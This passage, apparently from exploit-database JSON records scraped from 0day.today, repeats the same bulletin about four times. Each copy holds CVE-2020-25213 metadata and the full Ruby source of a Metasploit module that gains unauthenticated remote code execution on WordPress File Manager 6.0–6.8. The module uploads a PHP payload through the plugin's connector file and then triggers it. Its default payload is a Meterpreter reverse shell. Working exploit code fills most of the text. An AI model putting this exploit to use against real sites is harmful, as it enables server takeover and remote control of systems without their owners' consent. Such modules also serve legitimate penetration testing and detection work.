arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-25T22:10:55", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-25T00:19:23", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-25T00:19:23", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-09-26] #", "category": "", "verified": false}, "lastseen": "2021-09-25T22:10:55", "differentElements": ["sourceData"], "edition": 23}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "a52ef07d6c6b019446f5f407249b6f0e", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-26T22:13:47", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-25T00:19:23", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-25T00:19:23", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-09-27] #", "category": "", "verified": false}, "lastseen": "2021-09-26T22:13:47", "differentElements": ["sourceData"], "edition": 24}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "8b35cf519b0182acf018b37457337789", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-28T06:23:22", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-25T00:19:23", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-25T00:19:23", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-09-28] #", "category": "", "verified": false}, "lastseen": "2021-09-28T06:23:22", "differentElements": ["sourceData"], "edition": 25}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "56d071a2ee04bf5c9d46aca26701a7d1", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-28T22:23:53", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-25T00:19:23", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-25T00:19:23", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 